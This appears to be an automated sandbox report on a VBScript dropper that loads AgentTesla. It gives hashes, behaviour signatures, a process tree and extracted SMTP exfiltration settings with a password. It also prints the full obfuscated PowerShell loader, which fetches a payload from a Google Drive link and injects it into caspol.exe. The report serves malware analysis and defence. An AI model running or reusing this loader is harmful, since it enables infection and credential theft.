Analysis
-
max time kernel
111s -
max time network
129s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
08-02-2023 18:41
Static task
static1
Behavioral task
behavioral1
Sample
Sipariş.28.vbs
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
Sipariş.28.vbs
Resource
win10v2004-20220901-en
General
-
Target
Sipariş.28.vbs
-
Size
125KB
-
MD5
90f6cad58fa39455b2bd712eb9a9e5d4
-
SHA1
72e110e777392aa23aba252deedbae00ce93d01a
-
SHA256
88caf41122ae930ca97f30367279b2065148a9319224e34c132eab0cfad2561b
-
SHA512
1cdb50e920c078ed39000b63cf70e0351795d5e7704b29c1905d0678dae5e721bfbf26b57ecf667990ab55c7076add780fffe2478b44bb5ddfb2f3f2d6b1f33a
-
SSDEEP
1536:FFHXmJmnq3Cj74LIHCWF0KcBFuw4AZfsz/1U/727jPysWIJuHhgz26qZgFfga7oj:FYYq3Cj8LqE9ly7jPTWCuHiq0fga7oj
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=1-WQl_IuA-mYLU2KIuYz-IB-5GgJqjQQP
Extracted
agenttesla
Protocol: smtp- Host:
smtp.1and1.es - Port:
587 - Username:
[email protected] - Password:
Adara2020* - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 3 IoCs
Processes:
WScript.exepowershell.exeflow pid process 4 5080 WScript.exe 19 1740 powershell.exe 21 1740 powershell.exe -
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
Processes:
powershell.execaspol.exedescription ioc process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe caspol.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
caspol.exepid process 2348 caspol.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.execaspol.exepid process 1740 powershell.exe 2348 caspol.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 1740 set thread context of 2348 1740 powershell.exe caspol.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 428 2348 WerFault.exe caspol.exe -
Processes:
WScript.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 WScript.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 WScript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 WScript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 WScript.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepowershell.exepid process 4380 powershell.exe 4380 powershell.exe 1740 powershell.exe 1740 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 1740 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.execaspol.exedescription pid process Token: SeDebugPrivilege 4380 powershell.exe Token: SeDebugPrivilege 1740 powershell.exe Token: SeDebugPrivilege 2348 caspol.exe -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 5080 wrote to memory of 1412 5080 WScript.exe cmd.exe PID 5080 wrote to memory of 1412 5080 WScript.exe cmd.exe PID 5080 wrote to memory of 5072 5080 WScript.exe cmd.exe PID 5080 wrote to memory of 5072 5080 WScript.exe cmd.exe PID 5080 wrote to memory of 4380 5080 WScript.exe powershell.exe PID 5080 wrote to memory of 4380 5080 WScript.exe powershell.exe PID 4380 wrote to memory of 1740 4380 powershell.exe powershell.exe PID 4380 wrote to memory of 1740 4380 powershell.exe powershell.exe PID 4380 wrote to memory of 1740 4380 powershell.exe powershell.exe PID 1740 wrote to memory of 2348 1740 powershell.exe caspol.exe PID 1740 wrote to memory of 2348 1740 powershell.exe caspol.exe PID 1740 wrote to memory of 2348 1740 powershell.exe caspol.exe PID 1740 wrote to memory of 2348 1740 powershell.exe caspol.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Sipariş.28.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:5080 -
C:\Windows\System32\cmd.execmd /c echo off2⤵PID:1412
-
C:\Windows\System32\cmd.execmd /c echo rshell2⤵PID:5072
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reno = """Function Udvidend11 { param([String]`$Unintrusiv); `$Knyedesk = ''; Write-Host `$Knyedesk; Write-Host `$Knyedesk; Write-Host `$Knyedesk; `$crania = New-Object byte[] (`$Unintrusiv.Length / 2); For(`$Boli171=0; `$Boli171 -lt `$Unintrusiv.Length; `$Boli171+=2){ `$crania[`$Boli171/2] = [convert]::ToByte(`$Unintrusiv.Substring(`$Boli171, 2), 16); `$bourgsi = (`$crania[`$Boli171/2] -bxor 16); `$crania[`$Boli171/2] = `$bourgsi; } [String][System.Text.Encoding]::ASCII.GetString(`$crania);}`$Uprea0=Udvidend11 '43696364757D3E747C7C';`$Uprea1=Udvidend11 '5D7973627F637F76643E47797E23223E457E637176755E71647966755D7564787F7463';`$Uprea2=Udvidend11 '57756440627F7351747462756363';`$Uprea3=Udvidend11 '43696364757D3E42657E64797D753E597E6475627F6043756266797375633E58717E747C75427576';`$Uprea4=Udvidend11 '636462797E77';`$Uprea5=Udvidend11 '5775645D7F74657C7558717E747C75';`$Uprea6=Udvidend11 '42444360757379717C5E717D753C305879747552694379773C304065727C7973';`$Uprea7=Udvidend11 '42657E64797D753C305D717E71777574';`$Uprea8=Udvidend11 '4275767C757364757454757C7577716475';`$Uprea9=Udvidend11 '597E5D757D7F62695D7F74657C75';`$tabulator0=Udvidend11 '5D6954757C757771647544696075';`$tabulator1=Udvidend11 '537C7163633C304065727C79733C304375717C75743C30517E6379537C7163633C305165647F537C716363';`$tabulator2=Udvidend11 '597E667F7B75';`$tabulator3=Udvidend11 '4065727C79733C305879747552694379773C305E7567437C7F643C304679626465717C';`$tabulator4=Udvidend11 '4679626465717C517C7C7F73';`$tabulator5=Udvidend11 '7E64747C7C';`$tabulator6=Udvidend11 '5E6440627F647573644679626465717C5D757D7F6269';`$tabulator7=Udvidend11 '595548';`$tabulator8=Udvidend11 '4C';`$Elektrok=Udvidend11 '454355422322';`$Overnatni=Udvidend11 '53717C7C47797E747F6740627F7351';function fkp {Param (`$gaffs, `$Animalizes) ;`$Immerging0 =Udvidend11 '346062797E302D30384B516060547F7D71797E4D2A2A53656262757E64547F7D71797E3E577564516363757D727C7975633839306C3047787562753D5F727A757364306B30344F3E577C7F72717C516363757D727C695371737875303D517E7430344F3E5C7F737164797F7E3E43607C79643834647172657C71647F6228394B3D214D3E556165717C63383445606275712039306D393E57756444696075383445606275712139';.(`$tabulator7) `$Immerging0;`$Immerging5 = Udvidend11 '345E7F7E65607C7564302D30346062797E3E5775645D7564787F7438344560627571223C304B446960754B4D4D305038344560627571233C30344560627571243939';.(`$tabulator7) `$Immerging5;`$Immerging1 = Udvidend11 '62756465627E30345E7F7E65607C75643E597E667F7B7538347E657C7C3C3050384B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E58717E747C754275764D385E75673D5F727A7573643043696364757D3E42657E64797D753E597E6475627F6043756266797375633E58717E747C7542757638385E75673D5F727A75736430597E64406462393C3038346062797E3E5775645D7564787F74383445606275712539393E597E667F7B7538347E657C7C3C305038347771767663393939393C3034517E797D717C796A75633939';.(`$tabulator7) `$Immerging1;}function GDT {Param ([Parameter(Position = 0, Mandatory = `$True)] [Type[]] `$Linntwit,[Parameter(Position = 1)] [Type] `$Isthmus132 = [Void]);`$Immerging2 = Udvidend11 '345F7676757E647C797764302D304B516060547F7D71797E4D2A2A53656262757E64547F7D71797E3E547576797E7554697E717D7973516363757D727C6938385E75673D5F727A7573643043696364757D3E4275767C757364797F7E3E516363757D727C695E717D75383445606275712839393C304B43696364757D3E4275767C757364797F7E3E557D79643E516363757D727C695265797C7475625173737563634D2A2A42657E393E547576797E7554697E717D79735D7F74657C7538344560627571293C303476717C6375393E547576797E75446960753834647172657C71647F62203C3034647172657C71647F62213C304B43696364757D3E5D657C64797371636454757C75777164754D39';.(`$tabulator7) `$Immerging2;`$Immerging3 = Udvidend11 '345F7676757E647C7977643E547576797E75537F7E6364626573647F6238344560627571263C304B43696364757D3E4275767C757364797F7E3E53717C7C797E77537F7E66757E64797F7E634D2A2A4364717E747162743C30345C797E7E64677964393E437564597D607C757D757E647164797F7E567C717763383445606275712739';.(`$tabulator7) `$Immerging3;`$Immerging4 = Udvidend11 '345F7676757E647C7977643E547576797E755D7564787F743834647172657C71647F62223C3034647172657C71647F62233C3034596364787D65632123223C30345C797E7E64677964393E437564597D607C757D757E647164797F7E567C717763383445606275712739';.(`$tabulator7) `$Immerging4;`$Immerging5 = Udvidend11 '62756465627E30345F7676757E647C7977643E536275716475446960753839';.(`$tabulator7) `$Immerging5 ;}`$Struktura = Udvidend11 '7B75627E757C2322';`$Udvidend03 = Udvidend11 '577564537F7E637F7C7547797E747F67';`$Udvidend00=Udvidend11 '43787F6747797E747F67';`$Udvidend01 = Udvidend11 '34637B6671747475302D304B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A57756454757C7577716475567F6256657E7364797F7E407F797E6475623838767B603034557C757B64627F7B30344574667974757E742020393C30385754443050384B597E644064624D3C304B45597E6423224D3930384B597E644064624D393939';.(`$tabulator7) `$Udvidend01;`$Udvidend02 = Udvidend11 '345F667562607C757E302D304B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A57756454757C7577716475567F6256657E7364797F7E407F797E6475623838767B603034436462657B6465627130344574667974757E742023393C30385754443050384B597E644064624D3930384B597E644064624D393939';.(`$tabulator7) `$Udvidend02;`$Immerging7 = Udvidend11 '345D71627B717E647D7564302D30345F667562607C757E3E597E667F7B75382039';.(`$tabulator7) `$Immerging7;`$Immerging7 = Udvidend11 '34637B66717474753E597E667F7B7538345D71627B717E647D75643C302039';.(`$tabulator7) `$Immerging7;`$Immerging6 = Udvidend11 '34757E64717D7F75302D304B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A57756454757C7577716475567F6256657E7364797F7E407F797E6475623838767B603034436462657B646562713034647172657C71647F6224393C30385754443050384B597E644064624D3C304B45597E6423224D3C304B45597E6423224D3C304B45597E6423224D3930384B597E644064624D393939';.(`$tabulator7) `$Immerging6;`$Fuca = fkp `$tabulator5 `$tabulator6;`$Immerging7 = Udvidend11 '34637F7379717C7D75747923302D3034757E64717D7F753E597E667F7B75384B597E644064624D2A2A4A75627F3C302625223C302068232020203C302068242039';.(`$tabulator7) `$Immerging7;`$Immerging8 = Udvidend11 '34567562797562302D3034757E64717D7F753E597E667F7B75384B597E644064624D2A2A4A75627F3C3029212822202023223C302068232020203C3020682439';.(`$tabulator7) `$Immerging8;`$Udvidend01 = 'https://drive.google.com/uc?export=download&id=1-WQl_IuA-mYLU2KIuYz-IB-5GgJqjQQP';`$Udvidend00 = Udvidend11 '344364717463647A75212128302D30385E75673D5F727A757364305E75643E477572537C79757E64393E547F677E7C7F7174436462797E7738344574667974757E74202139';`$Immerging8 = Udvidend11 '34637F7379717C7D757479222D34757E662A71606074716471';.(`$tabulator7) `$Immerging8;`$socialmedi2=`$socialmedi2+'\Potentialn.dat';`$Stadstje118='';if (-not(Test-Path `$socialmedi2)) {while (`$Stadstje118 -eq '') {.(`$tabulator7) `$Udvidend00;Start-Sleep 5;}Set-Content `$socialmedi2 `$Stadstje118;}`$Stadstje118 = Get-Content `$socialmedi2;`$Immerging9 = Udvidend11 '34597D7D756277797E77302D304B43696364757D3E537F7E667562644D2A2A56627F7D527163752624436462797E7738344364717463647A7521212839';.(`$tabulator7) `$Immerging9;`$Stadstje1180 = Udvidend11 '4B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A537F60693834597D7D756277797E773C30203C303034637F7379717C7D757479233C3026252239';.(`$tabulator7) `$Stadstje1180;`$Udlednings=`$Immerging.count-652;`$Stadstje1181 = Udvidend11 '4B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A537F60693834597D7D756277797E773C302625223C30345675627975623C303445747C75747E797E776339';.(`$tabulator7) `$Stadstje1181;`$Stadstje1182 = Udvidend11 '344275737F7E7475222120302D304B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A57756454757C7577716475567F6256657E7364797F7E407F797E6475623838767B603034557C757B64627F7B30345F6675627E71647E79393C30385754443050384B597E644064624D3C304B597E644064624D3C304B597E644064624D3C304B597E644064624D3C304B597E644064624D3930384B597E644064624D393939';.(`$tabulator7) `$Stadstje1182;`$Stadstje1183 = Udvidend11 '344275737F7E74752221203E597E667F7B753834637F7379717C7D757479233C345675627975623C34566573713C203C2039';.(`$tabulator7) `$Stadstje1183#;""";Function Stadstje1189 { param([String]$Unintrusiv); For($Boli171=0; $Boli171 -lt $Unintrusiv.Length-1; $Boli171+=(0+1)){$Udvidend = $Udvidend + $Unintrusiv.Substring($Boli171, 1)}; $Udvidend;}$Caris0 = Stadstje1189 'IEX ';$Caris1= Stadstje1189 $Reno;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Caris1 ;}else{.$Caris0 $Caris1;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Udvidend11 { param([String]$Unintrusiv); $Knyedesk = ''; Write-Host $Knyedesk; Write-Host $Knyedesk; Write-Host $Knyedesk; $crania = New-Object byte[] ($Unintrusiv.Length / 2); For($Boli171=0; $Boli171 -lt $Unintrusiv.Length; $Boli171+=2){ $crania[$Boli171/2] = [convert]::ToByte($Unintrusiv.Substring($Boli171, 2), 16); $bourgsi = ($crania[$Boli171/2] -bxor 16); $crania[$Boli171/2] = $bourgsi; } [String][System.Text.Encoding]::ASCII.GetString($crania);}$Uprea0=Udvidend11 '43696364757D3E747C7C';$Uprea1=Udvidend11 '5D7973627F637F76643E47797E23223E457E637176755E71647966755D7564787F7463';$Uprea2=Udvidend11 '57756440627F7351747462756363';$Uprea3=Udvidend11 '43696364757D3E42657E64797D753E597E6475627F6043756266797375633E58717E747C75427576';$Uprea4=Udvidend11 '636462797E77';$Uprea5=Udvidend11 '5775645D7F74657C7558717E747C75';$Uprea6=Udvidend11 '42444360757379717C5E717D753C305879747552694379773C304065727C7973';$Uprea7=Udvidend11 '42657E64797D753C305D717E71777574';$Uprea8=Udvidend11 '4275767C757364757454757C7577716475';$Uprea9=Udvidend11 '597E5D757D7F62695D7F74657C75';$tabulator0=Udvidend11 '5D6954757C757771647544696075';$tabulator1=Udvidend11 '537C7163633C304065727C79733C304375717C75743C30517E6379537C7163633C305165647F537C716363';$tabulator2=Udvidend11 '597E667F7B75';$tabulator3=Udvidend11 '4065727C79733C305879747552694379773C305E7567437C7F643C304679626465717C';$tabulator4=Udvidend11 '4679626465717C517C7C7F73';$tabulator5=Udvidend11 '7E64747C7C';$tabulator6=Udvidend11 '5E6440627F647573644679626465717C5D757D7F6269';$tabulator7=Udvidend11 '595548';$tabulator8=Udvidend11 '4C';$Elektrok=Udvidend11 '454355422322';$Overnatni=Udvidend11 '53717C7C47797E747F6740627F7351';function fkp {Param ($gaffs, $Animalizes) ;$Immerging0 =Udvidend11 '346062797E302D30384B516060547F7D71797E4D2A2A53656262757E64547F7D71797E3E577564516363757D727C7975633839306C3047787562753D5F727A757364306B30344F3E577C7F72717C516363757D727C695371737875303D517E7430344F3E5C7F737164797F7E3E43607C79643834647172657C71647F6228394B3D214D3E556165717C63383445606275712039306D393E57756444696075383445606275712139';.($tabulator7) $Immerging0;$Immerging5 = Udvidend11 '345E7F7E65607C7564302D30346062797E3E5775645D7564787F7438344560627571223C304B446960754B4D4D305038344560627571233C30344560627571243939';.($tabulator7) $Immerging5;$Immerging1 = Udvidend11 '62756465627E30345E7F7E65607C75643E597E667F7B7538347E657C7C3C3050384B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E58717E747C754275764D385E75673D5F727A7573643043696364757D3E42657E64797D753E597E6475627F6043756266797375633E58717E747C7542757638385E75673D5F727A75736430597E64406462393C3038346062797E3E5775645D7564787F74383445606275712539393E597E667F7B7538347E657C7C3C305038347771767663393939393C3034517E797D717C796A75633939';.($tabulator7) $Immerging1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Linntwit,[Parameter(Position = 1)] [Type] $Isthmus132 = [Void]);$Immerging2 = Udvidend11 '345F7676757E647C797764302D304B516060547F7D71797E4D2A2A53656262757E64547F7D71797E3E547576797E7554697E717D7973516363757D727C6938385E75673D5F727A7573643043696364757D3E4275767C757364797F7E3E516363757D727C695E717D75383445606275712839393C304B43696364757D3E4275767C757364797F7E3E557D79643E516363757D727C695265797C7475625173737563634D2A2A42657E393E547576797E7554697E717D79735D7F74657C7538344560627571293C303476717C6375393E547576797E75446960753834647172657C71647F62203C3034647172657C71647F62213C304B43696364757D3E5D657C64797371636454757C75777164754D39';.($tabulator7) $Immerging2;$Immerging3 = Udvidend11 '345F7676757E647C7977643E547576797E75537F7E6364626573647F6238344560627571263C304B43696364757D3E4275767C757364797F7E3E53717C7C797E77537F7E66757E64797F7E634D2A2A4364717E747162743C30345C797E7E64677964393E437564597D607C757D757E647164797F7E567C717763383445606275712739';.($tabulator7) $Immerging3;$Immerging4 = Udvidend11 '345F7676757E647C7977643E547576797E755D7564787F743834647172657C71647F62223C3034647172657C71647F62233C3034596364787D65632123223C30345C797E7E64677964393E437564597D607C757D757E647164797F7E567C717763383445606275712739';.($tabulator7) $Immerging4;$Immerging5 = Udvidend11 '62756465627E30345F7676757E647C7977643E536275716475446960753839';.($tabulator7) $Immerging5 ;}$Struktura = Udvidend11 '7B75627E757C2322';$Udvidend03 = Udvidend11 '577564537F7E637F7C7547797E747F67';$Udvidend00=Udvidend11 '43787F6747797E747F67';$Udvidend01 = Udvidend11 '34637B6671747475302D304B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A57756454757C7577716475567F6256657E7364797F7E407F797E6475623838767B603034557C757B64627F7B30344574667974757E742020393C30385754443050384B597E644064624D3C304B45597E6423224D3930384B597E644064624D393939';.($tabulator7) $Udvidend01;$Udvidend02 = Udvidend11 '345F667562607C757E302D304B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A57756454757C7577716475567F6256657E7364797F7E407F797E6475623838767B603034436462657B6465627130344574667974757E742023393C30385754443050384B597E644064624D3930384B597E644064624D393939';.($tabulator7) $Udvidend02;$Immerging7 = Udvidend11 '345D71627B717E647D7564302D30345F667562607C757E3E597E667F7B75382039';.($tabulator7) $Immerging7;$Immerging7 = Udvidend11 '34637B66717474753E597E667F7B7538345D71627B717E647D75643C302039';.($tabulator7) $Immerging7;$Immerging6 = Udvidend11 '34757E64717D7F75302D304B43696364757D3E42657E64797D753E597E6475627F6043756266797375633E5D71626378717C4D2A2A57756454757C7577716475567F6256657E7364797F7E407F797E6475623838767B603034436462657B646562713034647172657C71647F6224393C30385754443050384B597E644064624D3C304B45597E6423224D3C304B45597E6423224D3C304B45597E6423224D3930384B597E644064624D393939';.($tabulator7) $Immerging6;$Fuca = fkp $tabulator5 $tabulator6;$Immerging7 = Udvidend11 '34637F7379717C7D75747923302D3034757E64717D7F753E597E667F7B75384B597E644064624D2A2A4A75627F3C302625223C302068232020203C302068242039';.($tabulator7) $Immerging7;$Immerging8 = Udvidend11 